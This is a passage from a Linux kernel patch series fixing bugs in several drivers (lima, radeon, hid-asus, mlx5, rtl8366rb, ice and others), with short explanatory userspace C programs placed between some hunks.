++}
++
+ static struct kmem_cache *lima_pp_task_slab;
+ static int lima_pp_task_slab_refcnt;
+ 
+@@ -447,6 +464,7 @@ int lima_pp_pipe_init(struct lima_device *dev)
+ 	pipe->task_fini = lima_pp_task_fini;
+ 	pipe->task_error = lima_pp_task_error;
+ 	pipe->task_mmu_error = lima_pp_task_mmu_error;
++	pipe->task_mask_irq = lima_pp_task_mask_irq;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/lima/lima_sched.c b/drivers/gpu/drm/lima/lima_sched.c
+index e82931712d8a2..9e836fad4a654 100644
+--- a/drivers/gpu/drm/lima/lima_sched.c
++++ b/drivers/gpu/drm/lima/lima_sched.c
+@@ -402,6 +402,13 @@ static enum drm_gpu_sched_stat lima_sched_timedout_job(struct drm_sched_job *job
+ 	struct lima_sched_task *task = to_lima_task(job);
+ 	struct lima_device *ldev = pipe->ldev;
+ 
++	/*
++	 * The task might still finish while this timeout handler runs.
++	 * To prevent a race condition on its completion, mask all irqs
++	 * on the running core until the next hard reset completes.
++	 */
++	pipe->task_mask_irq(pipe);
++
+ 	if (!pipe->error)
+ 		DRM_ERROR("lima job timeout\n");
+ 
+diff --git a/drivers/gpu/drm/lima/lima_sched.h b/drivers/gpu/drm/lima/lima_sched.h
+index 6a11764d87b38..edf205be43699 100644
+--- a/drivers/gpu/drm/lima/lima_sched.h
++++ b/drivers/gpu/drm/lima/lima_sched.h
+@@ -80,6 +80,7 @@ struct lima_sched_pipe {
+ 	void (*task_error)(struct lima_sched_pipe *pipe);
+ 	void (*task_mmu_error)(struct lima_sched_pipe *pipe);
+ 	int (*task_recover)(struct lima_sched_pipe *pipe);
++	void (*task_mask_irq)(struct lima_sched_pipe *pipe);
+ 
+ 	struct work_struct recover_work;
+ };
+diff --git a/drivers/gpu/drm/radeon/sumo_dpm.c b/drivers/gpu/drm/radeon/sumo_dpm.c
+index d49c145db4370..f7f1ddc6cdd81 100644
+--- a/drivers/gpu/drm/radeon/sumo_dpm.c
++++ b/drivers/gpu/drm/radeon/sumo_dpm.c
+@@ -1621,6 +1621,8 @@ void sumo_construct_vid_mapping_table(struct radeon_device *rdev,
+ 
+ 	for (i = 0; i < SUMO_MAX_HARDWARE_POWERLEVELS; i++) {
+ 		if (table[i].ulSupportedSCLK != 0) {
++			if (table[i].usVoltageIndex >= SUMO_MAX_NUMBER_VOLTAGES)
++				continue;
+ 			vid_mapping_table->entries[table[i].usVoltageIndex].vid_7bit =
+ 				table[i].usVoltageID;
+ 			vid_mapping_table->entries[table[i].usVoltageIndex].vid_2bit =
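
The radeon hunk above skips table entries whose voltage index would write past the end of vid_mapping_table->entries[]. The same guard in a self-contained userspace program (all names and sizes invented):

#include <stdio.h>

#define MAX_VOLTAGES 4

static int vid_7bit[MAX_VOLTAGES];

int main(void)
{
	const unsigned int index[] = { 0, 2, 7, 3 };	/* 7 is out of range */
	const int vid[] = { 10, 20, 30, 40 };

	for (int i = 0; i < 4; i++) {
		/* Skip out-of-range indices instead of corrupting memory,
		 * mirroring the `continue` in the hunk above. */
		if (index[i] >= MAX_VOLTAGES)
			continue;
		vid_7bit[index[i]] = vid[i];
	}
	for (int i = 0; i < MAX_VOLTAGES; i++)
		printf("vid_7bit[%d] = %d\n", i, vid_7bit[i]);
	return 0;
}
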
+diff --git a/drivers/hid/hid-asus.c b/drivers/hid/hid-asus.c
+index 220d6b2af4d3f..1015fc0b40cb1 100644
+--- a/drivers/hid/hid-asus.c
++++ b/drivers/hid/hid-asus.c
+@@ -334,36 +334,20 @@ static int asus_raw_event(struct hid_device *hdev,
+ 	if (drvdata->quirks & QUIRK_MEDION_E1239T)
+ 		return asus_e1239t_event(drvdata, data, size);
+ 
+-	if (drvdata->quirks & QUIRK_USE_KBD_BACKLIGHT) {
++	/*
++	 * Skip these report IDs: the device emits a continuous stream associated
++	 * with the AURA mode it is in, which looks like an 'echo'.
++	 */
++	if (report->id == FEATURE_KBD_LED_REPORT_ID1 || report->id == FEATURE_KBD_LED_REPORT_ID2)
++		return -1;
++	if (drvdata->quirks & QUIRK_ROG_NKEY_KEYBOARD) {
+ 		/*
+-		 * Skip these report ID, the device emits a continuous stream associated
+-		 * with the AURA mode it is in which looks like an 'echo'.
++		 * G713 and G733 send these codes on some keypresses; depending on
++		 * the key pressed, they can trigger a shutdown event if not caught.
++		 */
+-		if (report->id == FEATURE_KBD_LED_REPORT_ID1 ||
+-				report->id == FEATURE_KBD_LED_REPORT_ID2) {
++		if (data[0] == 0x02 && data[1] == 0x30) {
+ 			return -1;
+-		/* Additional report filtering */
+-		} else if (report->id == FEATURE_KBD_REPORT_ID) {
+-			/*
+-			 * G14 and G15 send these codes on some keypresses with no
+-			 * discernable reason for doing so. We'll filter them out to avoid
+-			 * unmapped warning messages later.
+-			*/
+-			if (data[1] == 0xea || data[1] == 0xec || data[1] == 0x02 ||
+-					data[1] == 0x8a || data[1] == 0x9e) {
+-				return -1;
+-			}
+-		}
+-		if (drvdata->quirks & QUIRK_ROG_NKEY_KEYBOARD) {
+-			/*
+-			 * G713 and G733 send these codes on some keypresses, depending on
+-			 * the key pressed it can trigger a shutdown event if not caught.
+-			*/
+-			if(data[0] == 0x02 && data[1] == 0x30) {
+-				return -1;
+-			}
+ 		}
+-
+ 	}
+ 
+ 	if (drvdata->quirks & QUIRK_ROG_CLAYMORE_II_KEYBOARD) {
+@@ -1262,6 +1246,19 @@ static __u8 *asus_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 		rdesc[205] = 0x01;
+ 	}
+ 
++	/* match many more n-key devices */
++	if (drvdata->quirks & QUIRK_ROG_NKEY_KEYBOARD && *rsize > 15) {
++		for (int i = 0; i < *rsize - 15; i++) {
++			/* the count item is always at offset 14 from the 0x5a report ID */
++			if (rdesc[i] == 0x85 && rdesc[i + 1] == 0x5a &&
++			    rdesc[i + 14] == 0x95 && rdesc[i + 15] == 0x05) {
++				hid_info(hdev, "Fixing up Asus N-Key report descriptor\n");
++				rdesc[i + 15] = 0x01;
++				break;
++			}
++		}
++	}
++
+ 	return rdesc;
+ }
+ 
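
The asus_report_fixup() hunk scans the raw report descriptor for the byte pattern "Report ID 0x5a ... Report Count 5" and patches the count down to 1. A compilable userspace sketch of the same scan, operating on a fabricated descriptor:

#include <stdio.h>
#include <stddef.h>

/* Find 0x85 0x5a (Report ID 0x5a) followed 14 bytes later by 0x95 0x05
 * (Report Count 5), then patch the count to 1, as the fixup above does. */
static void fixup(unsigned char *rdesc, size_t rsize)
{
	if (rsize <= 15)
		return;
	for (size_t i = 0; i < rsize - 15; i++) {
		if (rdesc[i] == 0x85 && rdesc[i + 1] == 0x5a &&
		    rdesc[i + 14] == 0x95 && rdesc[i + 15] == 0x05) {
			rdesc[i + 15] = 0x01;
			break;
		}
	}
}

int main(void)
{
	unsigned char rdesc[20] = { 0 };	/* fabricated demo descriptor */

	rdesc[2] = 0x85; rdesc[3] = 0x5a;	/* Report ID 0x5a */
	rdesc[16] = 0x95; rdesc[17] = 0x05;	/* Report Count 5 */
	fixup(rdesc, sizeof(rdesc));
	printf("patched count byte: 0x%02x\n", rdesc[17]);	/* prints 0x01 */
	return 0;
}
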
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 405d88b08908d..97745a1f9c6f1 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -802,6 +802,7 @@
+ #define USB_DEVICE_ID_LOGITECH_AUDIOHUB 0x0a0e
+ #define USB_DEVICE_ID_LOGITECH_T651	0xb00c
+ #define USB_DEVICE_ID_LOGITECH_DINOVO_EDGE_KBD	0xb309
++#define USB_DEVICE_ID_LOGITECH_CASA_TOUCHPAD	0xbb00
+ #define USB_DEVICE_ID_LOGITECH_C007	0xc007
+ #define USB_DEVICE_ID_LOGITECH_C077	0xc077
+ #define USB_DEVICE_ID_LOGITECH_RECEIVER	0xc101
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 3816fd06bc953..17efe6e2a1a44 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -2084,6 +2084,12 @@ static const struct hid_device_id mt_devices[] = {
+ 			   USB_VENDOR_ID_LENOVO,
+ 			   USB_DEVICE_ID_LENOVO_X12_TAB) },
+ 
++	/* Logitech devices */
++	{ .driver_data = MT_CLS_NSMU,
++		HID_DEVICE(BUS_BLUETOOTH, HID_GROUP_MULTITOUCH_WIN_8,
++			USB_VENDOR_ID_LOGITECH,
++			USB_DEVICE_ID_LOGITECH_CASA_TOUCHPAD) },
++
+ 	/* MosArt panels */
+ 	{ .driver_data = MT_CLS_CONFIDENCE_MINUS_ONE,
+ 		MT_USB_DEVICE(USB_VENDOR_ID_ASUS,
+diff --git a/drivers/i2c/busses/i2c-ocores.c b/drivers/i2c/busses/i2c-ocores.c
+index 2e575856c5cd5..a2977ef5d1d41 100644
+--- a/drivers/i2c/busses/i2c-ocores.c
++++ b/drivers/i2c/busses/i2c-ocores.c
+@@ -442,8 +442,8 @@ static int ocores_init(struct device *dev, struct ocores_i2c *i2c)
+ 	oc_setreg(i2c, OCI2C_PREHIGH, prescale >> 8);
+ 
+ 	/* Init the device */
+-	oc_setreg(i2c, OCI2C_CMD, OCI2C_CMD_IACK);
+ 	oc_setreg(i2c, OCI2C_CONTROL, ctrl | OCI2C_CTRL_EN);
++	oc_setreg(i2c, OCI2C_CMD, OCI2C_CMD_IACK);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/infiniband/hw/mlx5/srq.c b/drivers/infiniband/hw/mlx5/srq.c
+index 09b365a98bbf3..731e6721a82bc 100644
+--- a/drivers/infiniband/hw/mlx5/srq.c
++++ b/drivers/infiniband/hw/mlx5/srq.c
+@@ -199,17 +199,20 @@ int mlx5_ib_create_srq(struct ib_srq *ib_srq,
+ 	int err;
+ 	struct mlx5_srq_attr in = {};
+ 	__u32 max_srq_wqes = 1 << MLX5_CAP_GEN(dev->mdev, log_max_srq_sz);
++	__u32 max_sge_sz =  MLX5_CAP_GEN(dev->mdev, max_wqe_sz_rq) /
++			    sizeof(struct mlx5_wqe_data_seg);
+ 
+ 	if (init_attr->srq_type != IB_SRQT_BASIC &&
+ 	    init_attr->srq_type != IB_SRQT_XRC &&
+ 	    init_attr->srq_type != IB_SRQT_TM)
+ 		return -EOPNOTSUPP;
+ 
+-	/* Sanity check SRQ size before proceeding */
+-	if (init_attr->attr.max_wr >= max_srq_wqes) {
+-		mlx5_ib_dbg(dev, "max_wr %d, cap %d\n",
+-			    init_attr->attr.max_wr,
+-			    max_srq_wqes);
++	/* Sanity check SRQ and sge size before proceeding */
++	if (init_attr->attr.max_wr >= max_srq_wqes ||
++	    init_attr->attr.max_sge > max_sge_sz) {
++		mlx5_ib_dbg(dev, "max_wr %d,wr_cap %d,max_sge %d, sge_cap:%d\n",
++			    init_attr->attr.max_wr, max_srq_wqes,
++			    init_attr->attr.max_sge, max_sge_sz);
+ 		return -EINVAL;
+ 	}
+ 
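
The mlx5 hunk derives the SGE cap by dividing the maximum receive WQE size by the data-segment size, then rejects requests above it. The arithmetic, with assumed capability values (on real hardware max_wqe_sz_rq comes from firmware and the segment size is sizeof(struct mlx5_wqe_data_seg)):

#include <stdio.h>

int main(void)
{
	unsigned int max_wqe_sz_rq = 512;	/* assumed cap value */
	unsigned int data_seg_sz = 16;		/* assumed segment size */
	unsigned int max_sge_sz = max_wqe_sz_rq / data_seg_sz;	/* 32 */
	unsigned int requested_sge = 40;

	if (requested_sge > max_sge_sz) {
		printf("max_sge %u exceeds cap %u: reject with -EINVAL\n",
		       requested_sge, max_sge_sz);
		return 1;
	}
	printf("max_sge %u fits (cap %u)\n", requested_sge, max_sge_sz);
	return 0;
}
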
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+index 82f100e591b5a..45b43f729f895 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+@@ -3199,7 +3199,7 @@ static void arm_smmu_setup_msis(struct arm_smmu_device *smmu)
+ 	smmu->priq.q.irq = msi_get_virq(dev, PRIQ_MSI_INDEX);
+ 
+ 	/* Add callback to free MSIs on teardown */
+-	devm_add_action(dev, arm_smmu_free_msis, dev);
++	devm_add_action_or_reset(dev, arm_smmu_free_msis, dev);
+ }
+ 
+ static void arm_smmu_setup_unique_irqs(struct arm_smmu_device *smmu)
+diff --git a/drivers/net/dsa/realtek/rtl8366rb.c b/drivers/net/dsa/realtek/rtl8366rb.c
+index 25f88022b9e44..0ea5491781001 100644
+--- a/drivers/net/dsa/realtek/rtl8366rb.c
++++ b/drivers/net/dsa/realtek/rtl8366rb.c
+@@ -186,7 +186,12 @@
+ #define RTL8366RB_LED_BLINKRATE_222MS		0x0004
+ #define RTL8366RB_LED_BLINKRATE_446MS		0x0005
+ 
++/* LED trigger event for each group */
+ #define RTL8366RB_LED_CTRL_REG			0x0431
++#define RTL8366RB_LED_CTRL_OFFSET(led_group)	\
++	(4 * (led_group))
++#define RTL8366RB_LED_CTRL_MASK(led_group)	\
++	(0xf << RTL8366RB_LED_CTRL_OFFSET(led_group))
+ #define RTL8366RB_LED_OFF			0x0
+ #define RTL8366RB_LED_DUP_COL			0x1
+ #define RTL8366RB_LED_LINK_ACT			0x2
+@@ -203,6 +208,11 @@
+ #define RTL8366RB_LED_LINK_TX			0xd
+ #define RTL8366RB_LED_MASTER			0xe
+ #define RTL8366RB_LED_FORCE			0xf
++
++/* The RTL8366RB_LED_X_X registers are used to manually set the LED state only
++ * when the corresponding LED group in RTL8366RB_LED_CTRL_REG is
++ * RTL8366RB_LED_FORCE. Otherwise, they are ignored.
++ */
+ #define RTL8366RB_LED_0_1_CTRL_REG		0x0432
+ #define RTL8366RB_LED_1_OFFSET			6
+ #define RTL8366RB_LED_2_3_CTRL_REG		0x0433
+@@ -998,28 +1008,20 @@ static int rtl8366rb_setup(struct dsa_switch *ds)
+ 	 */
+ 	if (priv->leds_disabled) {
+ 		/* Turn everything off */
+-		regmap_update_bits(priv->map,
+-				   RTL8366RB_LED_0_1_CTRL_REG,
+-				   0x0FFF, 0);
+-		regmap_update_bits(priv->map,
+-				   RTL8366RB_LED_2_3_CTRL_REG,
+-				   0x0FFF, 0);
+ 		regmap_update_bits(priv->map,
+ 				   RTL8366RB_INTERRUPT_CONTROL_REG,
+ 				   RTL8366RB_P4_RGMII_LED,
+ 				   0);
+-		val = RTL8366RB_LED_OFF;
+-	} else {
+-		/* TODO: make this configurable per LED */
+-		val = RTL8366RB_LED_FORCE;
+-	}
+-	for (i = 0; i < 4; i++) {
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_LED_CTRL_REG,
+-					 0xf << (i * 4),
+-					 val << (i * 4));
+-		if (ret)
+-			return ret;
++
++		for (i = 0; i < RTL8366RB_NUM_LEDGROUPS; i++) {
++			val = RTL8366RB_LED_OFF << RTL8366RB_LED_CTRL_OFFSET(i);
++			ret = regmap_update_bits(priv->map,
++						 RTL8366RB_LED_CTRL_REG,
++						 RTL8366RB_LED_CTRL_MASK(i),
++						 val);
++			if (ret)
++				return ret;
++		}
+ 	}
+ 
+ 	ret = rtl8366_reset_vlan(priv);
+@@ -1108,52 +1110,6 @@ rtl8366rb_mac_link_down(struct dsa_switch *ds, int port, unsigned int mode,
+ 	}
+ }
+ 
+-static void rb8366rb_set_port_led(struct realtek_priv *priv,
+-				  int port, bool enable)
+-{
+-	u16 val = enable ? 0x3f : 0;
+-	int ret;
+-
+-	if (priv->leds_disabled)
+-		return;
+-
+-	switch (port) {
+-	case 0:
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_LED_0_1_CTRL_REG,
+-					 0x3F, val);
+-		break;
+-	case 1:
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_LED_0_1_CTRL_REG,
+-					 0x3F << RTL8366RB_LED_1_OFFSET,
+-					 val << RTL8366RB_LED_1_OFFSET);
+-		break;
+-	case 2:
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_LED_2_3_CTRL_REG,
+-					 0x3F, val);
+-		break;
+-	case 3:
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_LED_2_3_CTRL_REG,
+-					 0x3F << RTL8366RB_LED_3_OFFSET,
+-					 val << RTL8366RB_LED_3_OFFSET);
+-		break;
+-	case 4:
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_INTERRUPT_CONTROL_REG,
+-					 RTL8366RB_P4_RGMII_LED,
+-					 enable ? RTL8366RB_P4_RGMII_LED : 0);
+-		break;
+-	default:
+-		dev_err(priv->dev, "no LED for port %d\n", port);
+-		return;
+-	}
+-	if (ret)
+-		dev_err(priv->dev, "error updating LED on port %d\n", port);
+-}
+-
+ static int
+ rtl8366rb_port_enable(struct dsa_switch *ds, int port,
+ 		      struct phy_device *phy)
+@@ -1167,7 +1123,6 @@ rtl8366rb_port_enable(struct dsa_switch *ds, int port,
+ 	if (ret)
+ 		return ret;
+ 
+-	rb8366rb_set_port_led(priv, port, true);
+ 	return 0;
+ }
+ 
+@@ -1182,8 +1137,6 @@ rtl8366rb_port_disable(struct dsa_switch *ds, int port)
+ 				 BIT(port));
+ 	if (ret)
+ 		return;
+-
+-	rb8366rb_set_port_led(priv, port, false);
+ }
+ 
+ static int
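
The new RTL8366RB_LED_CTRL_OFFSET()/_MASK() macros above carve the single control register into one 4-bit field per LED group. A small userspace program showing the (mask, value) pairs the setup loop hands to regmap_update_bits():

#include <stdio.h>

#define LED_CTRL_OFFSET(g)	(4 * (g))
#define LED_CTRL_MASK(g)	(0xf << LED_CTRL_OFFSET(g))
#define LED_OFF			0x0

int main(void)
{
	for (int g = 0; g < 4; g++) {
		unsigned int mask = LED_CTRL_MASK(g);
		unsigned int val = LED_OFF << LED_CTRL_OFFSET(g);

		printf("group %d: mask=0x%04x val=0x%04x\n", g, mask, val);
	}
	return 0;
}
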
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 77ea19bcdc6fe..20e2fae64e67f 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -617,9 +617,6 @@ static netdev_tx_t bnxt_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	return NETDEV_TX_OK;
+ 
+ tx_dma_error:
+-	if (BNXT_TX_PTP_IS_SET(lflags))
+-		atomic_inc(&bp->ptp_cfg->tx_avail);
+-
+ 	last_frag = i;
+ 
+ 	/* start back at beginning and unmap skb */
+@@ -641,6 +638,8 @@ static netdev_tx_t bnxt_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ tx_free:
+ 	dev_kfree_skb_any(skb);
+ tx_kick_pending:
++	if (BNXT_TX_PTP_IS_SET(lflags))
++		atomic_inc(&bp->ptp_cfg->tx_avail);
+ 	if (txr->kick_pending)
+ 		bnxt_txr_db_kick(bp, txr, txr->tx_prod);
+ 	txr->tx_buf_ring[txr->tx_prod].skb = NULL;
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index 6d75e5638f665..1fe9cccf18d2f 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -901,6 +901,7 @@ void ice_print_link_msg(struct ice_vsi *vsi, bool isup);
+ int ice_plug_aux_dev(struct ice_pf *pf);
+ void ice_unplug_aux_dev(struct ice_pf *pf);
+ int ice_init_rdma(struct ice_pf *pf);
++void ice_deinit_rdma(struct ice_pf *pf);
+ const char *ice_aq_str(enum ice_aq_err aq_err);
+ bool ice_is_wol_supported(struct ice_hw *hw);
+ void ice_fdir_del_all_fltrs(struct ice_vsi *vsi);
+diff --git a/drivers/net/ethernet/intel/ice/ice_idc.c b/drivers/net/ethernet/intel/ice/ice_idc.c
+index 895c32bcc8b5e..579d2a433ea12 100644
+--- a/drivers/net/ethernet/intel/ice/ice_idc.c
++++ b/drivers/net/ethernet/intel/ice/ice_idc.c
+@@ -6,6 +6,8 @@
+ #include "ice_lib.h"
+ #include "ice_dcb_lib.h"
+ 
++static DEFINE_IDA(ice_aux_ida);
++
+ /**
+  * ice_get_auxiliary_drv - retrieve iidc_auxiliary_drv struct
+  * @pf: pointer to PF struct
+@@ -245,6 +247,17 @@ static int ice_reserve_rdma_qvector(struct ice_pf *pf)
+ 	return 0;
+ }
+ 
++/**
++ * ice_free_rdma_qvector - free vector resources reserved for RDMA driver
++ * @pf: board private structure to initialize
++ */
++static void ice_free_rdma_qvector(struct ice_pf *pf)
++{
++	pf->num_avail_sw_msix -= pf->num_rdma_msix;
++	ice_free_res(pf->irq_tracker, pf->rdma_base_vector,
++		     ICE_RES_RDMA_VEC_ID);
++}
++
+ /**
+  * ice_adev_release - function to be mapped to AUX dev's release op
+  * @dev: pointer to device to free
+@@ -331,12 +344,47 @@ int ice_init_rdma(struct ice_pf *pf)
+ 	struct device *dev = &pf->pdev->dev;
+ 	int ret;
+ 
++	if (!ice_is_rdma_ena(pf)) {
++		dev_warn(dev, "RDMA is not supported on this device\n");
++		return 0;
++	}
++
++	pf->aux_idx = ida_alloc(&ice_aux_ida, GFP_KERNEL);
++	if (pf->aux_idx < 0) {
++		dev_err(dev, "Failed to allocate device ID for AUX driver\n");
++		return -ENOMEM;
++	}
++
+ 	/* Reserve vector resources */
+ 	ret = ice_reserve_rdma_qvector(pf);
+ 	if (ret < 0) {
+ 		dev_err(dev, "failed to reserve vectors for RDMA\n");
+-		return ret;
++		goto err_reserve_rdma_qvector;
+ 	}
+ 	pf->rdma_mode |= IIDC_RDMA_PROTOCOL_ROCEV2;
+-	return ice_plug_aux_dev(pf);
++	ret = ice_plug_aux_dev(pf);
++	if (ret)
++		goto err_plug_aux_dev;
++	return 0;
++
++err_plug_aux_dev:
++	ice_free_rdma_qvector(pf);
++err_reserve_rdma_qvector:
++	pf->adev = NULL;
++	ida_free(&ice_aux_ida, pf->aux_idx);
++	return ret;
++}
++
++/**
++ * ice_deinit_rdma - deinitialize RDMA on PF
++ * @pf: ptr to ice_pf
++ */
++void ice_deinit_rdma(struct ice_pf *pf)
++{
++	if (!ice_is_rdma_ena(pf))
++		return;
++
++	ice_unplug_aux_dev(pf);
++	ice_free_rdma_qvector(pf);
++	ida_free(&ice_aux_ida, pf->aux_idx);
+ }
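
The rework above gives ice_init_rdma() the usual goto-based unwind: each failure label releases exactly what the earlier steps acquired, in reverse order. The generic shape as a standalone program, with malloc() standing in for ida_alloc() and the vector reservation:

#include <stdio.h>
#include <stdlib.h>

static int init_two_resources(void **a, void **b)
{
	*a = malloc(16);		/* stand-in for ida_alloc() */
	if (!*a)
		goto err_a;
	*b = malloc(16);		/* stand-in for vector reservation */
	if (!*b)
		goto err_b;
	return 0;

err_b:
	free(*a);			/* undo only what succeeded */
err_a:
	return -1;
}

int main(void)
{
	void *a, *b;

	if (init_two_resources(&a, &b))
		return 1;
	printf("acquired both resources\n");
	free(b);
	free(a);
	return 0;
}
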
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 3117f65253b37..6e55861dd86fe 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -45,7 +45,6 @@ MODULE_PARM_DESC(debug, "netif level (0=none,...,16=all), hw debug_mask (0x8XXXX
+ MODULE_PARM_DESC(debug, "netif level (0=none,...,16=all)");
+ #endif /* !CONFIG_DYNAMIC_DEBUG */
+ 
+-static DEFINE_IDA(ice_aux_ida);
+ DEFINE_STATIC_KEY_FALSE(ice_xdp_locking_key);
+ EXPORT_SYMBOL(ice_xdp_locking_key);
+ 
+@@ -4971,30 +4970,16 @@ ice_probe(struct pci_dev *pdev, const struct pci_device_id __always_unused *ent)
+ 
+ 	/* ready to go, so clear down state bit */
+ 	clear_bit(ICE_DOWN, pf->state);
+-	if (ice_is_rdma_ena(pf)) {
+-		pf->aux_idx = ida_alloc(&ice_aux_ida, GFP_KERNEL);
+-		if (pf->aux_idx < 0) {
+-			dev_err(dev, "Failed to allocate device ID for AUX driver\n");
+-			err = -ENOMEM;
+-			goto err_devlink_reg_param;
+-		}
+-
+-		err = ice_init_rdma(pf);
+-		if (err) {
+-			dev_err(dev, "Failed to initialize RDMA: %d\n", err);
+-			err = -EIO;
+-			goto err_init_aux_unroll;
+-		}
+-	} else {
+-		dev_warn(dev, "RDMA is not supported on this device\n");
++	err = ice_init_rdma(pf);
++	if (err) {
++		dev_err(dev, "Failed to initialize RDMA: %d\n", err);
++		err = -EIO;
++		goto err_devlink_reg_param;
+ 	}
+ 
+ 	ice_devlink_register(pf);
+ 	return 0;
+ 
+-err_init_aux_unroll:
+-	pf->adev = NULL;
+-	ida_free(&ice_aux_ida, pf->aux_idx);
+ err_devlink_reg_param:
+ 	ice_devlink_unregister_params(pf);
+ err_netdev_reg:
+@@ -5106,9 +5091,7 @@ static void ice_remove(struct pci_dev *pdev)
+ 	ice_service_task_stop(pf);
+ 
+ 	ice_aq_cancel_waiting_tasks(pf);
+-	ice_unplug_aux_dev(pf);
+-	if (pf->aux_idx >= 0)
+-		ida_free(&ice_aux_ida, pf->aux_idx);
++	ice_deinit_rdma(pf);
+ 	ice_devlink_unregister_params(pf);
+ 	set_bit(ICE_DOWN, pf->state);
+ 
+@@ -5268,7 +5251,7 @@ static int __maybe_unused ice_suspend(struct device *dev)
+ 	 */
+ 	disabled = ice_service_task_stop(pf);
+ 
+-	ice_unplug_aux_dev(pf);
++	ice_deinit_rdma(pf);
+ 
+ 	/* Already suspended?, then there is nothing to do */
+ 	if (test_and_set_bit(ICE_SUSPENDED, pf->state)) {
+@@ -5348,6 +5331,11 @@ static int __maybe_unused ice_resume(struct device *dev)
+ 	if (ret)
+ 		dev_err(dev, "Cannot restore interrupt scheme: %d\n", ret);
+ 
++	ret = ice_init_rdma(pf);
++	if (ret)
++		dev_err(dev, "Reinitialize RDMA during resume failed: %d\n",
++			ret);
++
+ 	clear_bit(ICE_DOWN, pf->state);
+ 	/* Now perform PF reset and rebuild */
+ 	reset_type = ICE_RESET_PFR;
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 5ea6365872571..735f995a3a687 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -1838,7 +1838,8 @@ ice_aq_alloc_free_vsi_list(struct ice_hw *hw, u16 *vsi_list_id,
+ 	    lkup_type == ICE_SW_LKUP_ETHERTYPE_MAC ||
+ 	    lkup_type == ICE_SW_LKUP_PROMISC ||
+ 	    lkup_type == ICE_SW_LKUP_PROMISC_VLAN ||
+-	    lkup_type == ICE_SW_LKUP_DFLT) {
++	    lkup_type == ICE_SW_LKUP_DFLT ||
++	    lkup_type == ICE_SW_LKUP_LAST) {
+ 		sw_buf->res_type = cpu_to_le16(ICE_AQC_RES_TYPE_VSI_LIST_REP);
+ 	} else if (lkup_type == ICE_SW_LKUP_VLAN) {
+ 		sw_buf->res_type =
+@@ -2764,7 +2765,8 @@ ice_update_vsi_list_rule(struct ice_hw *hw, u16 *vsi_handle_arr, u16 num_vsi,
+ 	    lkup_type == ICE_SW_LKUP_ETHERTYPE_MAC ||
+ 	    lkup_type == ICE_SW_LKUP_PROMISC ||
+ 	    lkup_type == ICE_SW_LKUP_PROMISC_VLAN ||
+-	    lkup_type == ICE_SW_LKUP_DFLT)
++	    lkup_type == ICE_SW_LKUP_DFLT ||
++	    lkup_type == ICE_SW_LKUP_LAST)
+ 		rule_type = remove ? ICE_AQC_SW_RULES_T_VSI_LIST_CLEAR :
+ 			ICE_AQC_SW_RULES_T_VSI_LIST_SET;
+ 	else if (lkup_type == ICE_SW_LKUP_VLAN)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index aee392a15b23c..e579183e52392 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -1152,8 +1152,11 @@ bool otx2_sq_append_skb(struct net_device *netdev, struct otx2_snd_queue *sq,
+ 
+ 	if (skb_shinfo(skb)->gso_size && !is_hw_tso_supported(pfvf, skb)) {
+ 		/* Insert vlan tag before giving pkt to tso */
+-		if (skb_vlan_tag_present(skb))
++		if (skb_vlan_tag_present(skb)) {
+ 			skb = __vlan_hwaccel_push_inside(skb);
++			if (!skb)
++				return true;
++		}
+ 		otx2_sq_append_tso(pfvf, sq, skb, qidx);
+ 		return true;
+ 	}
+diff --git a/drivers/net/ethernet/microchip/lan743x_ethtool.c b/drivers/net/ethernet/microchip/lan743x_ethtool.c
+index c739d60ee17d5..e47a579410fbb 100644
+--- a/drivers/net/ethernet/microchip/lan743x_ethtool.c
++++ b/drivers/net/ethernet/microchip/lan743x_ethtool.c
+@@ -1146,8 +1146,12 @@ static void lan743x_ethtool_get_wol(struct net_device *netdev,
+ 	if (netdev->phydev)
+ 		phy_ethtool_get_wol(netdev->phydev, wol);
+ 
+-	wol->supported |= WAKE_BCAST | WAKE_UCAST | WAKE_MCAST |
+-		WAKE_MAGIC | WAKE_PHY | WAKE_ARP;
++	if (wol->supported != adapter->phy_wol_supported)
++		netif_warn(adapter, drv, adapter->netdev,
